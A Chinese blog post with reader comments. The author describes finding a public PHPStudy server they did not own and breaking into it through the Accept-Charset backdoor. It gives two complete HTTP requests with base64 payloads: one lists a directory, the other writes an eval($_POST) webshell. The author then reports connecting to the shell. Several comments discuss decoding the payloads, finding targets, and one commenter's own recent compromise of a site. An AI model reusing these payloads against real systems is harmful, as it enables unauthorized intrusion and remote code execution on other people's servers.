AI智能摘要
当你以为PHPStudy环境安全无虞时,一个看似普通的phpinfo页面竟能成为入侵入口。本文将完整还原黑客如何利用编码参数漏洞,在目标服务器上实现目录遍历与Webshell植入的全过程。通过真实攻击案例演示,揭示老旧PHP版本中隐藏的致命风险,并附详细payload解析——这或许是你的服务器正在面临的隐形威胁。
— AI 生成的文章内容摘要
今天有点烦躁,所以得找点事刺激一下
于是,公网上搜了一个PHPstudy的站

测试payload看看有没有漏洞,果然、存在漏洞

看一下目录
GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ZWNobyBzeXN0ZW0oImRpciBEOlxwaHBTdHVkeVxXV1dcICIpOw== Connection: close
GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ZnB1dHMoZm9wZW4oJ0Q6XHBocFN0dWR5XFdXV1xzaGVsbC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFtraWxsXSk/PicpOw== Connection: close

再次查看一下目录,可以看到成功了

连接,OK,收工。。。


印度 1F
这payload看着有点眼熟,是那个Accept-Charset的漏洞吧?
上海市 B1
@ 星河滚烫 Payload确实是Accept-Charset注入,经典操作了。
北京市 B1
@ 星河滚烫 没错,就是2016年那个Accept-Charset RCE,靠base64传命令的老套路。
广东省深圳市 2F
刚入坑的小白问下,这个漏洞影响phpstudy所有版本吗?🤔
福建省 B1
@ 平衡天秤 影响范围主要在老版本,新版默认配置改了,应该没这问题。
上海市 3F
之前帮朋友处理过类似情况,也是被传了shell,折腾半天才清理干净。
陕西省西安市 4F
这个漏洞好像需要特定配置才会触发?
日本 5F
代码里那个base64解码出来是执行dir命令吧,有点东西。
内蒙古 B1
@ 暗黑魔王 dir命令执行那块base64解出来确实是列目录,后面写shell也顺理成章。
江苏省常州市 6F
测试环境用phpstudy的确实不少,方便是方便但安全配置容易疏忽。
上海市 7F
图片里是5.4.0版本,现在新版本还有这个问题不?
北京市 B1
@ 寂灭之誓 新版本好像修了,但很多人懒得升级,照样中招。
安徽省安庆市 8F
666,步骤挺清晰的,适合跟着复现一下。
上海市静安区 9F
这种老漏洞实战中还能碰到,说明很多站运维真不上心啊。
上海市 B1
@ 光禄勋 很多小公司图省事直接把phpstudy丢服务器上跑,防火墙都不设。
山东省 10F
感觉过程描述可以再细点,比如怎么定位到那个站点的。
湖北省武汉市 B1
@ 铁拳无敌 定位站点是不是用的fofa或者shodan啊?求个具体方法。
澳大利亚 11F
这漏洞复现起来其实挺简单的,照着步骤走就行。
湖北省武汉市 12F
Accept-Charset那个老洞了,没想到现在还有人中招。
广东省东莞市 B1
@ 月下独行者 这漏洞都多少年了,居然还有人没打补丁,服了。
河南省洛阳市 13F
我上周刚扫到一个站也是这个漏洞,直接getshell了。
上海市 14F
新手问下,PHPstudy不是本地开发工具吗?怎么公网还能搜到?🤔
陕西省咸阳市 15F
老版本PHPstudy默认开远程访问,很多小白根本不知道关。
广东省 B1
@ 幽魂歌者 默认开远程访问真的坑,我之前也栽过这上面。
河南省新乡市 16F
5.4.0太老了,但架不住有人还在生产环境跑这个……无语。
湖南省 17F
这个漏洞要Apache模块加载了php才行吧?纯nginx应该没事?
印度 18F
我之前也踩过这坑,本地调试完忘关远程访问,差点被挂马。
广东省广州市天河区 19F
新手求问:payload里的base64解出来具体是啥命令啊?看不懂。
北京市 20F
这操作看着简单,但没点基础连抓包都搞不定吧……
浙江省杭州市 21F
图片里Apache 2.4.39 + PHP 5.4.0,这组合现在还敢放公网?胆子真大。
台湾省 22F
感觉复现步骤跳得太快了,比如怎么确定目标用了phpstudy?
河南省新乡市 23F
又是这种“方便但危险”的工具,开发图快,运维背锅。
浙江省 24F
shell写进WWW目录就完事了?那权限是不是得看Apache跑的用户啊?
浙江省嘉兴市桐乡市 B1
@ 射手星轨 工具方便是方便,但安全意识也得跟上啊。
韩国 25F
新手问下,现在用phpstudy还安全吗?有点慌🤔
北京市 26F
shell写进去之后能干啥?是不是直接删库跑路?
浙江省温州市 27F
这操作看着简单,其实得先找到目标站吧?咋找的啊?
日本 28F
payload那段base64是传的dir命令吧?
日本 29F
前几天刚搞完这个,确实折腾了好久,权限问题卡半天。
印度 30F
又是老版本惹的祸,开发图快运维背锅实锤了。
韩国 31F
base64那段解出来是写shell?感觉可以再讲细点。
韩国 32F
本地工具放公网,这不是自己开门请黑客嘛……
浙江省金华市 33F
这操作确实挺基础的,适合新手练手。
河南省郑州市 34F
老洞了,现在新版本应该修复了吧。
北京市 35F
base64那段解密后是echo system(“dir D:phpStudyWWW “);吧?
湖南省长沙市 36F
这种洞实战里还挺常见的,运维不更新真的坑。
印度 37F
之前也遇到类似情况,修复起来挺麻烦的。
云南省昆明市 38F
payload构造得挺巧妙啊。
澳大利亚 B1
@ Red红莲 构造得蛮巧妙的
重庆市 39F
怎么确定目标站用了phpstudy呢?能细说下吗?
澳大利亚 40F
权限问题确实关键,不然shell也动不了啥。